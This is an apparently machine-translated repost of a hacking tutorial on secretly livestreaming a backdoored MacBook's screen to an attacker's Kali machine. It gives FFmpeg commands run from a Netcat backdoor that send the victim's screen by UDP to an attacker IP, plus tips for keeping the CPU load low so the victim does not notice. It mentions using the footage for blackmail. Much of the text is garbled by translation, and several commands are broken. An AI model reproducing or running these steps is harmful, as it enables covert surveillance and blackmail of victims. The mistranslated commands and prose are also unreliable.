قالب وردپرس درنا توس
Home / Tips and Tricks / How to Secretly Scan One's MacBook Screen by Livestream «Zero Byte :: WonderHowTo

How to Secretly Scan One's MacBook Screen by Livestream «Zero Byte :: WonderHowTo



It is possible to stream the entire computer screen of a MacBook without using Apple's Screen Sharing application and not opening any ports on the target device. A low-profile hacker on the backdoored Mac can see in real-time any victim's attack, no matter where he is.

In this article I will continue the hacking macOS series MacBooks Desktop on the system of an attacker, so that they can track the movements of each user in real time, without using the screen sharing capabilities of Apple. This assumes that the attacker has already configured a backdoor on the target Mac. Below is an example of the GIF of the attack in action.

In GIF, I stream a whole Apple computer screen (the victim) and look at Kali system (the attacker). This is achieved using FFmpeg, a multimedia framework that can decode, encode, transcode, convert, stream, and play back most file formats.

Such an attack is used by penetration testers who collect behavioral information about a target user and may discover it using information for further use of the device, the Wi-Fi network and information about the personal and professional life of the target. Black Hat hackers would also use such tactics to blackmail a user by using private emails, chats, iMessages and web browsing habits that could embarrass the victim in their professional or social life.

Step 1: Install FFmpeg in Kali

FFmpeg must be installed on both the attacker's Kali-Linux system and the target MacBook. This tool can be installed in Kali with the command apt-get install ffmpeg as shown below, just as we did when installing FFmpeg to spy on a MacBook microphone.

  apt-get install ffmpeg

Read package lists ... Done
Create dependency structure
Read status information ... Done
Recommended packages:
ffmpeg-doc
The following packages are being updated:
ffmpeg
1 updated, 0 reinstalled, 0 removed and 596 not updated.
Need 1.622 kB of archives.
After this process, 0 B of additional memory is allocated.
Received: 1 [http://archive-3.kali.org/kali ] kali-rolling / main amd64 ffmpeg amd64 7: 3.4.2-2 + b1 1,622 kB
Achieved 1,622 kB in 3s (540.9 kB / s)
Read changelogs ... Done
(Reading the database ... 312014 Files and directories are currently installed.)
Preparation for unpacking ... / ffmpeg_7% 3a3.4.2-2 + b1_amd64.deb ...
Open ffmpeg (7: 3.4.2-2 + b1) via (7: 3.4.2-1 + b1) ...
Setting up the Ffmpeg (7: 3.4.2-2 + b1) ...
Processing triggers for man-db (2.8.2-1) ... 

Step 2: Configuring FFmpeg in Kali

To get an incoming video stream from the victim's desktop, FFmpeg must be configured on the attacker system not only installed. The following command can be used to start and configure FFmpeg.

  ffmpeg -i udp: /0.0.0.0: 10001 /tmp/outputFile.avi

This command instructs FFmpeg to open the UDP port ( udp: // ) 10001 and accept entries ( -i ) at any available interface ( 0.0.0.0 ). The video stream is then saved in AVI format with the filename outputFile.avi in the / tmp directory. The port number (10001), the storage directory (/ tmp), and the output file name are arbitrary and can be changed as needed.

Step 3: Downloading and Configuring FFmpeg on the Backdoored Mac

Installing FFmpeg in macOS is very easy. In fact, there is no installation since no new software is added to the privileged directories / usr, / applications or / etc. To use FFmpeg in macOS, it is sufficient to download the binary file and execute it as a low priority user from the command line. The bulk of this step, just like the step in the FFmpeg article is installed on a target MacBook to spy on its microphone.

From the Netcat backdoor on the MacBook, use cURL to download FFmpeg and save the ZIP file / tmp directory. A directory other than / tmp can be used to prevent the victim user from suspecting. This can be done with the following command:

  curl # https: //ffmpeg.zeranoe.com/builds/macos64/static/ffmpeg-4.0-macos64-static.zip' -o /tmp/ffmpeg.zip[19659012] When the download is complete, uncompress the files with  unzip /tmp/ffmpeg.zip 

  unzip /tmp/ffmpeg.zip

Archive: ffmpeg.zip
Creation: ffmpeg-4.0-macos64-static /
Build: ffmpeg-4.0-macos64-static / bin /
Inflation: ffmpeg-4.0-macos64-static / bin / ffmpeg
Inflation: ffmpeg-4.0-macos64-static / bin / ffplay
Inflation: ffmpeg-4.0-macos64-static / bin / ffprobe
Creation: ffmpeg-4.0-macos64-static / doc /
Inflation: ffmpeg-4.0-macos64-static / doc / bootstrap.min.css
Inflation: ffmpeg-4.0-macos64-static / doc / default.css
Inflation: ffmpeg-4.0-macos64-static / doc / developer.html
Inflation: ffmpeg-4.0-macos64-static / doc / faq.html
Inflate: ffmpeg-4.0-macos64-static / doc / fate.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-all.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-bitstream-filters.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-codecs.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-devices.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-filters.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffmpeg-formats.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-protocols.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-resampler.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-scaler.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffmpeg-utils.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffmpeg.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffplay-all.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffplay.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffprobe-all.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffprobe.html
Inflation: ffmpeg-4.0-macos64-static / doc / general.html
Inflation: ffmpeg-4.0-macos64-static / doc / git-howto.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavcodec.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavdevice.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavfilter.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavformat.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavutil.html
Inflate: ffmpeg-4.0-macos64-static / doc / libswresample.html
Inflate: ffmpeg-4.0-macos64-static / doc / libswscale.html
Inflate: ffmpeg-4.0-macos64-static / doc / mailing-list-faq.html
Inflate: ffmpeg-4.0-macos64-static / doc / nut.html
Inflation: ffmpeg-4.0-macos64-static / doc / platform.html
Inflation: ffmpeg-4.0-macos64-static / doc / style.min.css
Inflation: ffmpeg-4.0-macos64-static / LICENSE.txt
Create: ffmpeg-4.0-macos64-static / Preferences /
Inflate: ffmpeg-4.0-macos64-static / Preferences / ffprobe.xsd
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-1080p.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-1080p50_60.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-360p.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-720p.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-720p50_60.ffpreset
inflation: ffmpeg-4.0-macos64-static / README.txt 

This creates a new directory named "ffmpeg-4.0-macos64-static /" that contains a bin / directory containing the ffmpeg contains binary file. Next, cd in this bin / directory

  cd ffmpeg-4.0-macos64-static / bin / 

Now make sure that the ffmpeg binary file can actually execute the chmod Command

  chmod 777 ffmpeg 

Then list the available input devices on the Mac with ./ ffmpeg -f avfoundation -list_devices tr as you can see below.

  ./ ffmpeg - f avfoundation -list_devices true -i ""

AVFoundation Input Device @ 0x7fda1bc152c0 AVFoundation Video Devices:
AVFoundation input device @ 0x7fda1bc152c0 0 FaceTime HD camera (built-in)
AVFoundation input device @ 0x7fda1bc152c0 1 Capture screen 0
AVFoundation input device @ 0x7fda1bc152c0 AVFoundation audio devices:
AVFoundation input device @ 0x7fda1bc152c0 0 USB Audio CODEC
AVFoundation Input Device @ 0x7fda1bc152c0 1 Built-in Microphone 

This command forces ( -f ) FFmpeg, the AVFoundation format, and the list ( -list_devices ) to use all available inputs ( -i ") Devices AVFoundation uses the convention" Video: Audio ", so recording videos with the" Capture Screen "(the entire screen) as" 1: "(or only "1") is displayed in the next command The capture screen is assigned to the video device "1."

To capture the entire MacBook display in a video format, run the following command from a Netcat shell on the Backdoctor MacBook

  ./ ffmpeg -f avfoundation -i "1" -f avi udp: // ATTACK IP ADDRESS: PORT 

This is the FFmpeg command in its simplest form; it will instruct FFmpeg to use Apple AV Foundation ( -f avfoundation ), screen input ( -i "1 ) in AVI video format ( -f avi ) and stream them via a UDP connection ( udp: // ) to the attacker's system. There are a number of arguments (shown in later steps) that can be included in the Optimize Video Output command.

From the Netcat shell, the following output will continue to generate data related to the video stream.

  [avfoundation @ 0x7fb5fc004800] The selected pixel format (yuv420p) is not supported by the input device.
[avfoundation @ 0x7fb5fc004800] Supported pixel formats:
[avfoundation @ 0x7fb5fc004800] Uyvy422
[avfoundation @ 0x7fb5fc004800] yuyv422
[avfoundation @ 0x7fb5fc004800] nv12
[avfoundation @ 0x7fb5fc004800] 0rgb
[avfoundation @ 0x7fb5fc004800] bgr0
[avfoundation @ 0x7fb5fc004800] Overrides the selected pixel format to use uyvy422 instead.
[avfoundation @ 0x7fb5fc004800] Stream # 0: not enough frames to estimate the rate; consider increasing the probe size
Input # 0, avfoundation, from & # 39; 1 & # 39 ;:
Duration: N / A, Start: 24679.553333, Bitrate: N / A
Stream # 0: 0: Video: Raw video (UYVY / 0x59565955), Uyvy422, 1440x900, 1000k TB, 1000k TBN, 1000k TBC
Stream Mapping:
Stream # 0: 0 -> # 0: 0 (raw video (native) -> mpeg4 (native))
Press [q] to stop [?] for help
[avi @ 0x7fb5fc082a00] The frame rate is very high if a muxer does not support it efficiently.
Please note a lower frame rate, another muxer or -vsync 2
Issue # 0, avi, after & # 39; udp: //192.168.2.13: 10001 & # 39 ;:
metadata:
ISFT: lavf58.12.100
Stream # 0: 0: Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 1440x900, q = 2-31, 200 kb / s, 65535 fps, 600 tbn, 65535 tbc
metadata:
Encoder: Lavc58.18.100 mpeg4
Page data:
cpb: bit rate max / min / average: 0/0/200000 buffer size: 0 vbv_delay: -1
Frame = 154 fps = 18 q = 31.0 size = 1044kB time = 00: 00: 08.60 bitrate = 994.1kbqts / s speed = 1.01x
Frame = 1042 fps = 17 q = 31.0 Lsize = 7487kB Time = 00: 01: 02.43 Bitrate = 982.3kbits / s Speed ​​= 0.999x
Video: 7193kB Audio: 0kB Subtitle: 0kB Other Streams: 0kB Global Header: 0kB Muxing Overhead: 4.089208% 

Back on the attacker's server, the FFmpeg terminal also displays video stream data and begins outputting to the specified address to save (/ tmp) directory. As long as the FFmpeg terminals are running on both machines, the MacBook continues to send videos and store them on the server of the attacker.

  Enter # 0, avi, from & # 39; udp: /0.0.0.0: 10001 & # 39 ;:
metadata:
Encoder: Lavf58.12.100
Duration: 497: 06: 09.71, Start: 0.000000, Bitrate: N / A
Stream # 0: 0: Video: mpeg4 (Simple Profile) (FMP4 / 0x34504D46), yuv420p, 1440x900 [SAR 1:1 DAR 8:5] 600 fps, 30 tbr, 600 tbn, 65535 tbc
Stream Mapping:
Stream # 0: 0 -> # 0: 0 (mpeg4 (native) -> mpeg4 (native))
Press [q] to stop [?] for help
Output # 0, avi, after & # 39; /tmp/outputFile.avi&#39 ;:
metadata:
ISFT: lavf57.83.100
Stream # 0: 0: Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 1440x900 [SAR 1:1 DAR 8:5] q = 2-31, 200 kb / s, 30 fps, 30 tbn, 30 tbc
metadata:
Encoder: Lavc57.107.100 mpeg4
Page data:
cpb: bit rate max / min / average: 0/0/200000 buffer size: 0 vbv_delay: -1
[mpeg4 @ 0x5610900ed100] MB error: 3600
[mpeg4 @ 0x5610900ed100] Disc end not reached, but screen end (11780 left 700303, result = -63)
[mpeg4 @ 0x5610900ed100] obscured 1618 DC, 1618 AC, 1618 MV error in I-frame
Image = 211 fps = 13 q = 31.0 size = 1286kB time = 00: 00: 19.83 bitrate = 531.0kbits / s speed = 1.19x 

Step 4: Install MPV & Watch Streaming Video

Tap the video stream can play with MPV, a terminal-based application that is capable of a variety of file formats from the command line. Use apt-get install mpv to install MPV in Kali.

  apt-get install mpv

Read package lists ... Done
Create dependency structure
Read status information ... Done
The following NEW packages will be installed:
mPV
0 updated, 1 reinstalled, 0 removed and 596 not updated.
Need 0 B / 933 kB of archives.
After this operation, 2,293 KB of additional memory will be used.
Selecting the previously unselected package mpv.
(Reading the database ... 311978 Files and directories are currently installed.)
Preparation for unpacking ... / mpv_0.27.2-1_amd64.deb ...
Unpack mpv (0.27.2-1) ...
Setting up mpv (0.27.2-1) ... 

Then use MPV to watch the video with:

  mpv --keep-open = yes /tmp/outputFile.avi

The - -keep-open argument is not required, but keeps the MPV command from closing when the end of the AVI file is reached.

As already mentioned, FFmpeg continues to write video data to the output file. avi. Since this happens in real time, it occasionally reaches the end of the file before FFmpeg can process the streaming video. This is similar to buffering YouTube videos before they can be played. MPV can not play the video if FFmpeg was not processed. I would recommend leaving a ten-second buffer in the MPV terminal for a seamless ( near-real-time ) streaming experience.

Step 5: Optimizing video output (optional)

A major issue I found with FFmpeg to stream video was its CPU usage on the target MacBook. It took a lot of processing power to stream the capture screen to my potash server.

top a tool for displaying running processes on the MacBook while streaming FFmpeg can illustrate the CPU spike

  processes: 287 total, 2 running, 285 sleeping, 890 threads 18:27:25
Networks: Packages: 66590 / 55M in, 464311 / 526M out. Disks: 141297 / 3511M read, 102846 / 1545M written.

PID COMMAND% CPU TIME #TH #WQ #PORT MEM PURG CMPR PGRP PPID STATE
4672 Master 0.0 00: 00.03 1 0 20 884K 0B 0B 4672 1 asleep
4671 CVM Compiler 0.0 00: 00.15 2 2 27 9080K 40K 0B 4671 1 sleeping
4670 ffmpeg 47,6 00: 11,17 15 3 144 61M 0B 0B 4510 4521 sleep
4640 Bash 0.0 00: 00.04 1 0 19 888K 0B 0B 4640 4639 sleeping
4639 login 0.0 00: 00.03 2 1 30 1448K 0B 0B 4639 504 sleeping
4632 netbiosd 0.0 00: 00.05 2 2 25 2384K 0B 0B 4632 1 sleeping
4243 com.apple.We 0.0 00: 00.24 4 1 66 3496K 0B 0B 4243 1 dormant 

Note the FFmpeg process (PID: 4670) at 47.6% CPU utilization, while other applications at 0.0% Workload remain. This creates a real problem, since any MacBook that runs multiple applications at the same time (eg, Chrome, iMessages, iTunes, Preview) is likely to have a poor battery life. The CPU, which runs at almost 50% for an extended period of time, is likely to cause the built-in MacBook fan to run at full speed and further reduce the battery life of the device.

After revising the FFmpeg commands, I discovered some of the arguments that can be included in the command for improving the CPU load on the MacBook.

Tip 1. Locking the number of CPU threads

FFmpeg sets the CPU thread count to 0 or "optimal" by default. Essentially, this means that FFmpeg automatically decides how to optimally use the MacBook's CPU. However, this does not necessarily mean that the battery life has priority or CPU overloads are considered.

To lock only one CPU thread for the FFmpeg process, add the argument -threads 1 to the FFmpeg command. While the improvement is low (only 5% decrease in CPU usage), I thought it was worth mentioning.

  ./ffmpeg -f avfoundation -i "1" threads 1 -f avi udp: // ATTACKER-IP-ADDRESS: PORT 

Tip 2. Reduce the frame rate

The frame rate (expressed in frames per second or FPS) is the frequency (rate) at which successive frames called frames are displayed on a screen. This is essentially how many screenshots (frames) are used per second to create a video file.

By default FFmpeg uses 30 frames per second. With FFmpeg's -r argument, it is possible to drastically reduce the FPS in the video output. Now, while this significantly improves the CPU usage on the MacBook, the video output gets very restless and seems to be skipped. Text in the video will still be readable, but the video will appear more like a picture or a GIF update per second. If a high fps error-free video stream is not required, using the following command will significantly reduce the CPU load on the MacBook

  ./ ffmpeg -f avfoundation -i "1" threads 1 -f avi -r 1 udp : // ATTACKER IP ADDRESS: PORT 

Tip 3. Experiment with quality to see what works best

FFmpeg has a number of options that can improve the MacBook's video quality and CPU utilization. I encourage readers to experiment with all available arguments and features. In Kali, the FFmpeg manual can be viewed using the following command.

  man ffmpeg 

Protection Against Video Streaming Attacks

It is likely that antivirus software does not ward off these types of attacks. After all, FFmpeg is not considered a malicious application and does not try to open ports or modify files on the computer.

A Mac user can often search with top or suspicious processes ps but actually not much can be done. Finally, I'll show how to hide these types of processes from active user recognition so that ps and top methods are not a surefire way to detect abuse anyway.

And unlike listening to a microphone, a user can not easily disconnect a cable in the computer to prevent screen-sharing attacks. They can stay offline when they are not needed, which could easily mitigate attacks.

Stay tuned for more macOS hacks

So now you know how a hacker can stream audio and video from a backdoored MacBook. But we're not done with hacking Macs yet. There's a lot more to explore besides what we've already discussed so keep coming back and looking for more Mac hacks.

Do not Miss: How to Install a Persistent Empire Backdoor on a MacBook [19659065] Title image by TheUnownPhotographer / PEXELS; Screenshots of tokyoneon / zero byte


Source link